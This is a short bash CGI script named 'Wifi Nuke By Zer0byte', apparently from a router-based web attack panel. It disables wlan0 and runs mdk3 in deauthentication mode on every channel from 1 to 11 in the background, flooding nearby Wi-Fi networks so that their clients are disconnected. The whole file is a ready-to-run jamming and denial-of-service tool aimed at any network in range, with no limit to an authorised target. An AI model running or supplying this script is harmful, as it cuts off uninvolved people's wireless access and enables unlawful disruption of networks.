#!/bin/bash

echo "Content-type: text/html"
echo ""

if [ !  -f /www/cgi-bin/sword/wifi/mon.txt ]; then

echo "<script>alert(\"Wi-Fi monitor mode is not enabled on Mon0\")</script>"
exit
fi


echo "<html><head><title>Wifi Nuke By Zer0byte </title></head>"

ifconfig wlan0 down

mdk3 mon0 d -c 1,2,3,4,5,6,7,8,9,10,11  > /www/cgi-bin/sword/wifi/wifinuke/tmp.txt &

#/www/cgi-bin/sword/wifi/mdk3/cat.sh
/www/cgi-bin/sword/wifi/wifinuke/refresh
echo "</body></html>"